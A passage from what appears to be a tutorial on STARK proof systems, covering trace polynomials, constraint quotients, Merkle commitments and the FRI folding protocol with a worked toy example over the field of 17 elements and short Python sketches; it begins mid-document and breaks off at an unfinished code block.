&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Register 1&lt;&#x2F;th&gt;&lt;th&gt;Register 2&lt;&#x2F;th&gt;&lt;th&gt;$\dots$&lt;&#x2F;th&gt;&lt;th&gt;Register w&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$x_{1,0}$&lt;&#x2F;td&gt;&lt;td&gt;$x_{2,0}$&lt;&#x2F;td&gt;&lt;td&gt;$\dots$&lt;&#x2F;td&gt;&lt;td&gt;$x_{w,0}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$x_{1,1}$&lt;&#x2F;td&gt;&lt;td&gt;$x_{2,1}$&lt;&#x2F;td&gt;&lt;td&gt;$\dots$&lt;&#x2F;td&gt;&lt;td&gt;$x_{w,1}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$\vdots$&lt;&#x2F;td&gt;&lt;td&gt;$\vdots$&lt;&#x2F;td&gt;&lt;td&gt;$\ddots$&lt;&#x2F;td&gt;&lt;td&gt;$\vdots$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$x_{1,T}$&lt;&#x2F;td&gt;&lt;td&gt;$x_{2,T}$&lt;&#x2F;td&gt;&lt;td&gt;$\dots$&lt;&#x2F;td&gt;&lt;td&gt;$x_{w,T}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;We will interpret each column (register) as the evaluation of a polynomial over a domain (we will call it the trace evaluation domain). For example, we can say that $f_1(x)$ is the polynomial representing column 1 and thus:&lt;br &#x2F;&gt;
$f_1(0)=x_{1,0}$&lt;br &#x2F;&gt;
$f_1(1)=x_{1,1}$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$f_1(T)=x_{1,T}$&lt;&#x2F;p&gt;
&lt;p&gt;To make things easier and faster, we will use as trace evaluation domain a multiplicative subgroup of $\mathbb{Z}_p^\star$ of size $2^n$, such that $2^n \geq T$. That subgroup has a generator, $\omega$, which spans all its elements, so the subgroup can be represented by the powers of $\omega$, $\{ 1, \omega , \omega^2 , \omega^3 ,…, \omega^{2^n - 1} \}$. Our trace polynomial then satisfies&lt;br &#x2F;&gt;
$f_1(1)=x_{1,0}$&lt;br &#x2F;&gt;
$f_1(\omega)=x_{1,1}$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$f_1(\omega^{T})=x_{1,T}$&lt;&#x2F;p&gt;
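&lt;p&gt;As a concrete illustration, the following sketch interpolates a trace column over a small multiplicative subgroup of $\mathbb{Z}_{17}^\star$. The field, generator, and trace values here are toy choices of ours, not what a real prover would use:&lt;&#x2F;p&gt;

```python
# Lagrange interpolation of a trace column over a multiplicative subgroup.
# Toy parameters: F_17, and a generator w of order 4.
p = 17
w = 13                                     # 13^2 = 16, 13^4 = 1 (mod 17)
domain = [pow(w, k, p) for k in range(4)]  # [1, 13, 16, 4]
trace = [3, 9, 13, 16]                     # repeated squaring of 3 mod 17

def lagrange_eval(xs, ys, x, p):
    """Evaluate the unique interpolating polynomial of (xs, ys) at x mod p."""
    total = 0
    for i in range(len(xs)):
        num, den = 1, 1
        for j in range(len(xs)):
            if i != j:
                num = num * (x - xs[j]) % p
                den = den * (xs[i] - xs[j]) % p
        total = (total + ys[i] * num * pow(den, -1, p)) % p
    return total

# The trace polynomial satisfies f_1(w^k) = x_{1,k} for every row k:
assert all(lagrange_eval(domain, trace, domain[k], p) == trace[k]
           for k in range(4))
```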
&lt;p&gt;The elements in the execution trace satisfy certain relations given by the computation and boundary conditions. We call these relations constraints. They can be broadly classified into two groups:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Boundary constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Transition constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Boundary constraints are rather straightforward: they specify the value of a register at a given time. For example, when we initialize the computations, each register has a given value. In the case of the Fibonacci sequence,&lt;br &#x2F;&gt;
$a_0=a_1=1$&lt;br &#x2F;&gt;
If our trace consists of a single column representing the sequence, the first two elements are equal to one:&lt;br &#x2F;&gt;
$x_{1,0}=1$&lt;br &#x2F;&gt;
$x_{1,1}=1$&lt;&#x2F;p&gt;
&lt;p&gt;We can translate the constraints into polynomial relations. We know that $x_{1,0}=f_1(1)$ and $x_{1,1}=f_1(\omega)$. If the constraint holds, say at $x=\omega$, then the linear factor $x-\omega$ divides $f_1(x)-1$. This means that the result of the division of $f_1(x)-1$ by $x-\omega$ is a polynomial,&lt;br &#x2F;&gt;
$$ Q_{BC,1}(x)=\frac{f_1(x)-1}{x-\omega} $$&lt;br &#x2F;&gt;
Analogously,&lt;br &#x2F;&gt;
$$ Q_{BC,0}(x)=\frac{f_1(x)-1}{x-1} $$&lt;&#x2F;p&gt;
&lt;p&gt;One drawback in this approach is that if we have $n$ boundary constraints, we get $n$ polynomials. One optimization is to interpolate boundary constraints and obtain a new polynomial. In this case,&lt;br &#x2F;&gt;
$f_{BC}(1)=1$&lt;br &#x2F;&gt;
$f_{BC}(\omega)=1$&lt;br &#x2F;&gt;
Combining everything, we get&lt;br &#x2F;&gt;
$$ Q_{BC}(x)=\frac{f_1(x)-f_{BC}(x)}{Z_{BC}(x)}$$&lt;br &#x2F;&gt;
where $Z_{BC}(x)$ is the polynomial vanishing on the points where the boundary conditions are enforced:&lt;br &#x2F;&gt;
$Z_{BC}(x)=(x-1)(x-\omega)$&lt;&#x2F;p&gt;
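&lt;p&gt;We can check this exactness numerically. The sketch below works over the toy field $\mathbb{Z}_{17}$ with $\omega=13$ (illustrative parameters of ours): if $f_1$ takes the value $1$ at both $1$ and $\omega$, dividing $f_1(x)-1$ by each linear factor of $Z_{BC}$ leaves no remainder.&lt;&#x2F;p&gt;

```python
# Exactness of the boundary quotient over F_17 (toy parameters).
p, w = 17, 13

def divide_linear(coeffs, r, p):
    """Synthetic division of a polynomial (highest degree first) by (x - r)
    over F_p; returns (quotient, remainder)."""
    acc, out = 0, []
    for c in coeffs:
        acc = (acc * r + c) % p
        out.append(acc)
    return out[:-1], out[-1]

# f_1(x) = x^2 + 3x + 14 satisfies f_1(1) = f_1(w) = 1, so f_BC(x) = 1 and
# f_1(x) - f_BC(x) = x^2 + 3x + 13 (coefficients highest degree first):
f_minus_fbc = [1, 3, 13]

q1, r1 = divide_linear(f_minus_fbc, 1, p)  # divide by (x - 1)
q2, r2 = divide_linear(q1, w, p)           # then by (x - w)
assert r1 == 0 and r2 == 0                 # both divisions are exact
print(q2)  # [1]: Q_BC(x) is the constant polynomial 1
```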
&lt;p&gt;Transition constraints are relations between different rows that can be applied at various calculation points. In the case of the Fibonacci sequence, we have $a_{n+2}=a_{n+1}+a_n$ for every $n={0,1,…T-2 }$. In terms of the trace polynomial,&lt;br &#x2F;&gt;
$f_1(\omega^2 x)-f_1(\omega x)-f_1(x)=0$&lt;br &#x2F;&gt;
If the constraint is satisfied, the following function should be a polynomial,&lt;br &#x2F;&gt;
$$Q_T(x)=\frac{f_1(\omega^2 x)-f_1(\omega x)-f_1(x)}{Z_T(x)} $$&lt;br &#x2F;&gt;
where $Z_T(x)$ is the vanishing polynomial where the transition constraints are enforced,&lt;br &#x2F;&gt;
$Z_T(x)=\prod_{k=0}^{T-2} (x-\omega^k)$&lt;&#x2F;p&gt;
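&lt;p&gt;The same kind of check works for the transition constraint. In the sketch below (toy parameters of ours: $\mathbb{Z}_{17}$ and a subgroup of order 8), the combination $f_1(\omega^2 x)-f_1(\omega x)-f_1(x)$ vanishes at every point where the Fibonacci constraint is enforced:&lt;&#x2F;p&gt;

```python
# Fibonacci transition constraint on an interpolated trace.
# Toy parameters: F_17 and a generator w of order 8.
p = 17
w = 9                                      # 9 has order 8 mod 17
domain = [pow(w, k, p) for k in range(8)]
trace = [1, 1, 2, 3, 5, 8, 13, 4]          # Fibonacci sequence mod 17

def lagrange_eval(xs, ys, x, p):
    """Evaluate the unique interpolating polynomial of (xs, ys) at x mod p."""
    total = 0
    for i in range(len(xs)):
        num, den = 1, 1
        for j in range(len(xs)):
            if i != j:
                num = num * (x - xs[j]) % p
                den = den * (xs[i] - xs[j]) % p
        total = (total + ys[i] * num * pow(den, -1, p)) % p
    return total

# f_1(w^2 x) - f_1(w x) - f_1(x) = 0 at every enforcement point:
for k in range(6):                         # rows 0 .. T-2
    x = domain[k]
    v = (lagrange_eval(domain, trace, w * w * x % p, p)
         - lagrange_eval(domain, trace, w * x % p, p)
         - lagrange_eval(domain, trace, x, p)) % p
    assert v == 0
```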
&lt;p&gt;Transition constraints are commonly expressed as multivariate polynomials linking two consecutive rows of the execution trace. For example, if we denote by $x$ a given row and $y$ is the next, a constraint could be something like&lt;br &#x2F;&gt;
$P(x,y)=y-x^2=0$&lt;br &#x2F;&gt;
If we compose the constraint polynomial with the trace polynomial, substituting $x$ by $t(x)$ and $y$ by $t(\omega x)$, we get&lt;br &#x2F;&gt;
$t(\omega x) - t(x)^2=0$&lt;&#x2F;p&gt;
&lt;p&gt;If we did the calculations properly, then $Q_{BC}(x)$ and $Q_T(x)$ should be polynomials; if not, they are rational functions (quotients of two polynomials). We can reduce proving that each of them is a polynomial to a single check by taking a random linear combination&lt;br &#x2F;&gt;
$$ CP(x)=\alpha_{BC} Q_{BC}(x)+\alpha_{T} Q_T(x) $$&lt;br &#x2F;&gt;
If $Q_{BC}(x)$ and $Q_T(x)$ are both polynomials, so is $CP(x)$. But if at least one of them is a rational function, then $CP(x)$ is unlikely to be a polynomial.&lt;&#x2F;p&gt;
&lt;p&gt;Given that proving that $CP(x)$ is a polynomial is difficult, we will show that it is close to a low-degree polynomial. To do so, we will project $CP(x)$ to a new function with a smaller degree. We will continue taking projections until we reach a constant polynomial. The critical ingredient is that the projection operation respects the distance. If the original function is far from a low-degree polynomial, then the projections will also be far from it. Before jumping to the procedure (called FRI), we must commit to the trace polynomials.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;committing-to-the-trace&quot;&gt;Committing to the trace&lt;&#x2F;h2&gt;
&lt;p&gt;We need to evaluate the trace polynomials over a much larger domain; the domain size is $\beta 2^n$, where $\beta$ is the blowup factor. To avoid problems, we shift the domain by multiplying the elements by $h$, an element outside the subgroup, obtaining a coset. The low-degree extension domain (simply, the domain) is given by&lt;br &#x2F;&gt;
$$D = \{ h, h \eta , h \eta^2 , … , h \eta^{ \beta 2^n -1} \} $$&lt;br &#x2F;&gt;
Here $\eta$ is a generator of the subgroup of order $\beta 2^n$; we use a different letter so that it does not get confused with $\omega$ (though we could relate them by taking $\omega=\eta^\beta$).&lt;br &#x2F;&gt;
We evaluate the trace polynomials over this large domain and obtain vectors representing each evaluation:&lt;br &#x2F;&gt;
$$[ f_1 (h) , f_1 (h \eta) ,… , f_1 (h \eta^{ \beta 2^n -1} )]$$&lt;br &#x2F;&gt;
$$[f_2 (h) , f_2 (h \eta) , … , f_2 (h \eta^{ \beta 2^n -1} )]$$&lt;br &#x2F;&gt;
$$\vdots$$&lt;br &#x2F;&gt;
$$[f_w (h) , f_w (h \eta ) , … , f_w ( h \eta^{ \beta 2^n -1} )]$$&lt;&#x2F;p&gt;
&lt;p&gt;To commit to these evaluations, we build Merkle trees, and the prover sends the root of the Merkle trees to the verifier. To make things easier, the elements of each row of the low-degree extension of the trace are grouped into a single leaf.&lt;&#x2F;p&gt;
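&lt;p&gt;A minimal sketch of such a commitment, using SHA-256 as the hash and a naive leaf encoding (a production prover would typically choose a different hash and a canonical serialization):&lt;&#x2F;p&gt;

```python
# Committing to trace evaluations with a Merkle tree.
# Minimal sketch using SHA-256; hash choice and leaf encoding are ours.
import hashlib

def h(data):
    return hashlib.sha256(data).digest()

def merkle_root(leaves):
    nodes = [h(repr(leaf).encode()) for leaf in leaves]
    while len(nodes) != 1:
        if len(nodes) % 2 == 1:
            nodes.append(nodes[-1])   # duplicate the last node on odd levels
        nodes = [h(nodes[i] + nodes[i + 1]) for i in range(0, len(nodes), 2)]
    return nodes[0]

# Each row of the low-degree extension becomes a single leaf:
lde_rows = [(3, 5), (3, 3), (12, 2), (13, 10)]   # toy (f_1, f_2) pairs
root = merkle_root(lde_rows)
print(root.hex())   # this single 32-byte digest is what the prover sends
```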
&lt;h2 id=&quot;committing-to-the-composition-polynomial&quot;&gt;Committing to the composition polynomial&lt;&#x2F;h2&gt;
&lt;p&gt;We use the same domain $D$ as before to evaluate the composition polynomial. We can then create a Merkle tree from these evaluations and send the root to the verifier.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;relating-the-lde-of-execution-trace-and-the-composition-polynomial&quot;&gt;Relating the LDE of execution trace and the composition polynomial&lt;&#x2F;h2&gt;
&lt;p&gt;At some point, the verifier will ask the prover for the value of the composition polynomial at one point, $z$, that is, $CP(z)$. The verifier needs to be sure that the composition polynomial results from applying the polynomial constraints onto the trace polynomials. Given the value $z \in D$ (in DEEP, the value of $z$ is sampled outside the domain), the prover needs to send the values of the trace polynomials at given points so that the verifier can check the calculation. For example, in the case of Fibonacci (we will ignore all other constraints just for simplicity),&lt;br &#x2F;&gt;
$P(u,v,w)=w-v-u=0$&lt;br &#x2F;&gt;
$P(t(x),t(\omega x),t(\omega^2 x))=t(\omega^2x)-t(\omega x)-t(x)=0$&lt;br &#x2F;&gt;
To create the composition polynomial, we must divide the previous polynomial by the corresponding vanishing polynomial. So, if we pick $x=z$, we have&lt;&#x2F;p&gt;
&lt;p&gt;$$Q(z)=\frac{t(\omega^2z)-t(\omega z)-t(z)}{Z_D(z)}$$&lt;&#x2F;p&gt;
&lt;p&gt;The prover needs to send those three values. Note that $z=h \eta^k$, so the prover needs to send the values of $t(\omega^2 h \eta^k)$, $t(\omega h \eta^k)$, $t( h \eta^k)$, which are separated by $\beta$ elements in the Merkle tree. The verifier takes the three values, evaluates the vanishing polynomials, and checks that&lt;br &#x2F;&gt;
$Q(z)=CP(z)$&lt;&#x2F;p&gt;
&lt;p&gt;This way, the verifier is convinced that the composition polynomial is related to the execution trace via the constraint polynomials.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;fri-protocol&quot;&gt;FRI protocol&lt;&#x2F;h2&gt;
&lt;p&gt;The prover must show that $CP(x)$ is close to a low-degree polynomial. To do so, he will randomly fold the polynomial, reducing the degree, until he gets a constant polynomial (in optimized versions, reaching a constant polynomial is unnecessary: the prover can stop earlier, send all the coefficients of the last polynomial, and have the verifier check it). The FRI protocol has two steps: commit and decommit.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;commitment&quot;&gt;Commitment&lt;&#x2F;h3&gt;
&lt;p&gt;The prover takes $CP(x)$ and splits it in the following way:&lt;br &#x2F;&gt;
$$g(x^2)=\frac{CP(x)+CP(-x)}{2}$$&lt;br &#x2F;&gt;
$$x h(x^2)=\frac{CP(x)-CP(-x)}{2}$$&lt;br &#x2F;&gt;
so that&lt;br &#x2F;&gt;
$$CP(x)=g(x^2)+x h(x^2)$$&lt;br &#x2F;&gt;
The verifier chooses a random value $\alpha_0$, and the prover forms the polynomial,&lt;br &#x2F;&gt;
$P_1(x)=g(x^2)+\alpha_0 h(x^2)$&lt;br &#x2F;&gt;
with the new domain $D_1 = \{ h^2 , h^2 \eta^2 , h^2 \eta^4 , … \}$, the set of squares of the elements of $D$, having half the size of $D$.&lt;&#x2F;p&gt;
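&lt;p&gt;In coefficient form, one folding step is a few lines of code. The sketch below (toy modulus $p=17$ and helper names of ours) splits a polynomial into its even and odd parts and recombines them with the verifier’s challenge:&lt;&#x2F;p&gt;

```python
# One FRI folding step in coefficient form over a toy modulus p = 17.
p = 17

def fold(coeffs, alpha, p):
    """Split CP(x) = g(x^2) + x*h(x^2) and return g + alpha*h.
    Coefficients are ordered lowest degree first."""
    g = coeffs[0::2]                 # even-degree coefficients
    hh = coeffs[1::2]                # odd-degree coefficients
    n = max(len(g), len(hh))
    g = g + [0] * (n - len(g))
    hh = hh + [0] * (n - len(hh))
    return [(a + alpha * b) % p for a, b in zip(g, hh)]

cp = [1, 0, 1, 1]                    # CP(x) = x^3 + x^2 + 1, degree 3
p1 = fold(cp, 3, p)                  # the degree drops to 1
print(p1)                            # [1, 4], i.e. 1 + 4y
```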
&lt;p&gt;The prover can perform the low-degree extension by evaluating $P_1(x)$ over $D_1$ and then commit to it by creating a Merkle tree and sending the root. He can continue with the procedure by halving the degree at each step. For step $k$, we have&lt;br &#x2F;&gt;
$$P_k(y^2)=\frac{P_{k-1}(y)+P_{k-1}(-y)}{2}+\alpha_{k-1}\left(\frac{P_{k-1}(y)-P_{k-1}(-y)}{2}\right)$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$D_k = \{ h^{ 2^{k} } , (h \eta)^{ 2^{k} } , … ,( \eta^l h)^{ 2^{k} } \}$$&lt;br &#x2F;&gt;
The prover evaluates $P_k(x)$ over $D_k$ and commits to it, sending the Merkle root.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;decommitment&quot;&gt;Decommitment&lt;&#x2F;h3&gt;
&lt;p&gt;The verifier chooses at random a point $z$ belonging to $D$. The prover needs to convince him that the trace polynomials and composition polynomial are related (we covered that previously) and that the elements of consecutive FRI layers are also related. For each layer, the prover needs to send two elements to the verifier, $P_k(z)$ and $P_k(-z)$. He also needs to show that these elements belong to the corresponding Merkle tree, so the authentication paths for each element are also required.&lt;&#x2F;p&gt;
&lt;p&gt;The verifier can check the correctness of the FRI layers by performing a colinearity check. Given $P_k(z)$, $P_k(-z)$ and $P_{k+1}(z^2)$, the verifier can compute&lt;br &#x2F;&gt;
$$g_{k+1}(z^2)=\frac{P_k(z)+P_k(-z)}{2}$$&lt;br &#x2F;&gt;
$$h_{k+1}(z^2)=\frac{P_k(z)-P_k(-z)}{2z}$$&lt;br &#x2F;&gt;
and get the value for the next layer&lt;br &#x2F;&gt;
$$u_{k+1}=g_{k+1}(z^2)+\alpha_k h_{k+1}(z^2)$$&lt;br &#x2F;&gt;
If the prover performed the calculations correctly, then&lt;br &#x2F;&gt;
$$u_{k+1}=P_{k+1}(z^2)$$&lt;&#x2F;p&gt;
&lt;h2 id=&quot;a-toy-example-for-fri&quot;&gt;A toy example for FRI&lt;&#x2F;h2&gt;
&lt;p&gt;We will use a simple example to understand how everything works on FRI. We choose $p=17$, whose multiplicative group has order $16=2^4$ and set $\eta=3$, which is a primitive root of unity (that is, $3^{16}=1$ and $3^k \neq 1$ for $0 &amp;lt;k&amp;lt;16$). Our composition polynomial is $P_0 (x) = x^3 + x^2 + 1$. The domain for the LDE is simply $ D_0 = \mathbb{Z_{17}}^\star = \{1 , 2 , 3 , 4 , 5 , 6 , … , 16 \}$. The following table contains the LDE of $P_0(x)$:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Index&lt;&#x2F;th&gt;&lt;th&gt;$x$&lt;&#x2F;th&gt;&lt;th&gt;$P_0(x)$&lt;&#x2F;th&gt;&lt;th&gt;Index&lt;&#x2F;th&gt;&lt;th&gt;$x$&lt;&#x2F;th&gt;&lt;th&gt;$P_0(x)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;16&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;16&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;td&gt;11&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;11&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Suppose the verifier samples $\beta_0=3$. The prover performs the random folding over $P_0(x)$,&lt;br &#x2F;&gt;
$g_1( x^2 ) = 1 + x^2$&lt;br &#x2F;&gt;
$xh_1 ( x^2 ) = x^3 $&lt;br &#x2F;&gt;
so&lt;br &#x2F;&gt;
$P_1 ( x^2 ) = 1 + ( 1 + \beta_0) x^2$&lt;br &#x2F;&gt;
To make things simpler,&lt;br &#x2F;&gt;
$P_1(y)=1+4y$&lt;br &#x2F;&gt;
with $y = x^2$. The new domain is obtained by squaring the elements of $D_0$. The LDE of $P_1(y)$ is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Index&lt;&#x2F;th&gt;&lt;th&gt;$y$&lt;&#x2F;th&gt;&lt;th&gt;$P_1(y)$&lt;&#x2F;th&gt;&lt;th&gt;Index&lt;&#x2F;th&gt;&lt;th&gt;$y$&lt;&#x2F;th&gt;&lt;th&gt;$P_1(y)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;16&lt;&#x2F;td&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;16&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The verifier samples $\beta_1=2$ and the prover folds $P_1(y)$ to get $P_2(z)$,&lt;br &#x2F;&gt;
$P_2(z)=1+4\beta_1=9$&lt;br &#x2F;&gt;
which is a constant polynomial. The domain $D_2 = \{ 1 , 13 , 16 , 4 \}$. All the elements in the LDE evaluate to 9, so there is no need for a table.&lt;&#x2F;p&gt;
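&lt;p&gt;The two folds above can be reproduced with a few lines of code (same toy parameters as the example):&lt;&#x2F;p&gt;

```python
# Reproducing the toy example: two folds take P_0 = x^3 + x^2 + 1 over F_17
# down to a constant polynomial.
p = 17

def fold(coeffs, beta, p):
    """One FRI fold: coeffs lowest degree first, combined with challenge beta."""
    g, hh = coeffs[0::2], coeffs[1::2]     # even / odd parts
    n = max(len(g), len(hh))
    g = g + [0] * (n - len(g))
    hh = hh + [0] * (n - len(hh))
    return [(a + beta * b) % p for a, b in zip(g, hh)]

def ev(coeffs, x, p):
    """Evaluate a polynomial (lowest degree first) at x mod p."""
    return sum(c * pow(x, i, p) for i, c in enumerate(coeffs)) % p

P0 = [1, 0, 1, 1]            # x^3 + x^2 + 1
P1 = fold(P0, 3, p)          # beta_0 = 3
P2 = fold(P1, 2, p)          # beta_1 = 2
assert P1 == [1, 4]          # the polynomial 1 + 4y
assert P2 == [9]             # the constant 9

# Spot checks against the tables above:
assert ev(P0, 13, p) == 4 and ev(P0, 4, p) == 13
assert ev(P1, 16, p) == 14 and ev(P1, 1, p) == 5
```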
&lt;p&gt;The evaluations of the polynomials $P_0(x)$, $P_1(x)$, and $P_2(x)$ are each committed using a Merkle tree and sent to the verifier.&lt;&#x2F;p&gt;
&lt;p&gt;Suppose the verifier selects index 4 in the LDE to check the correctness of the FRI layers. The prover needs to send him the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $P_0(13)=4$ and $P_0(-13)=P_0(4)=13$ and their authentication paths.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $P_1(16)=14$ and $P_1(-16)=P_1(1)=5$ and their authentication paths.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $P_2(4)=9$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We can see that, for the first layer, the prover passes the values at positions 4 and 12; for the next layer, positions 4 and 0 (the sibling position is $index+|D_1|&#x2F;2$, where $|D_1|$ is the number of elements in $D_1$; here that gives 8, which exceeds the maximum index, so we wrap around to 0).&lt;&#x2F;p&gt;
&lt;p&gt;The verifier does the following calculation,&lt;br &#x2F;&gt;
$$u=\frac{P_0(13)+P_0(4)}{2}+\beta_0\left(\frac{P_0(13)-P_0(4)}{2\times 13}\right)$$&lt;&#x2F;p&gt;
&lt;p&gt;Recall that division by $t$ is simply multiplication by $t^{-1}$. In the case of $2$, we have $2^{-1}=9$, since $2\times 9=18\equiv 1 \pmod{17}$. Thus,&lt;br &#x2F;&gt;
$$u=2^{-1}\left(4+13\right)+3\times 9^{-1}\left(4-13\right)$$&lt;br &#x2F;&gt;
The first term is $0$, while the second is $48\equiv 14 \pmod{17}$, so&lt;br &#x2F;&gt;
$u=14$.&lt;br &#x2F;&gt;
Next, he checks&lt;br &#x2F;&gt;
$u=P_1(16)$&lt;br &#x2F;&gt;
Both are $14$, so the first layer is correct.&lt;&#x2F;p&gt;
&lt;p&gt;The verifier moves on to the next layer. He needs to calculate&lt;br &#x2F;&gt;
$$u=\frac{P_1(16)+P_1(1)}{2}+\beta_1\left(\frac{P_1(16)-P_1(1)}{2\times 16}\right)$$&lt;&#x2F;p&gt;
&lt;p&gt;If we work the calculations,&lt;br &#x2F;&gt;
$$u=\frac{2}{2}+2\left(\frac{9}{2 \times 16}\right)$$&lt;br &#x2F;&gt;
But this is just&lt;br &#x2F;&gt;
$$u=1+(-9)=1+8=9$$&lt;br &#x2F;&gt;
Now,&lt;br &#x2F;&gt;
$$P_2(4)=9=u$$&lt;br &#x2F;&gt;
so all the layers have been checked. You should try selecting a different index and showing that all the calculations match.&lt;&#x2F;p&gt;
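&lt;p&gt;The two colinearity checks can also be replayed in code (same toy numbers as above):&lt;&#x2F;p&gt;

```python
# Replaying the verifier's colinearity checks over F_17.
p = 17

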